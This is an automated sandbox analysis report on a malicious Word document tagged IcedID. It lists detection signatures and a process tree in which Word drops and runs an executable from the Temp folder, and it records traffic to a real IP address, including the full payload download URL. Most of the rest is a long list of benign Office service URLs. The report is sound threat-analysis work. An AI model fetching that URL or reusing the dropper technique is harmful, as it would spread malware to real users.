Edit tour

Windows Analysis Report
airequipmentcorp-doc-08.11.2022.doc

Overview

General Information

Sample Name:	airequipmentcorp-doc-08.11.2022.doc
Analysis ID:	682577
MD5:	84904f679048e45c43210c22f8fcc5df
SHA1:	7e23ee02e2543e51a2ad97b2ede96c441d34e6eb
SHA256:	78c296d80214d887820a3c55bc06fbc42b17db90fb01aef0766365b383f1e7f1
Tags:	docIcedID
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (creates forbidden files)

Office process drops PE file

Machine Learning detection for sample

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains capabilities to detect virtual machines

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Queries disk information (often used to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 2240 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

rECA2.tmp.exe (PID: 5584 cmdline: "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WmiPrvSE.exe (PID: 5584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: airequipmentcorp-doc-08.11.2022.doc	Virustotal: Detection: 24%			Perma Link
Source: airequipmentcorp-doc-08.11.2022.doc	ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: airequipmentcorp-doc-08.11.2022.doc

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: rundll32.pdb source: rECA2.tmp.exe, rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr
Source:	Binary string: rundll32.pdbGCTL source: rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: rECA2.tmp.exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49738
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80

Source: global traffic

TCP traffic: 192.168.2.3:49738 -> 45.8.146.139:80

Source: winword.exe

Memory has grown: Private usage: 2MB later: 79MB

Source: Joe Sandbox View

IP Address: 45.8.146.139 45.8.146.139

Source: global traffic

HTTP traffic detected: GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139

Source: rECA2.tmp.exe, 00000002.00000002.273279102.0000000000E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
Source: rECA2.tmp.exe, 00000002.00000002.273378499.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rmRXL73GMCXOFE8AGP5ROGT8/rm8/rm8/rm_
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.office.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://augloop.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cdn.entity.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://cr.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://directory.services.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://graph.windows.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://invites.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://login.windows.local
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://management.azure.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://management.azure.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://osi.office.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office365.com
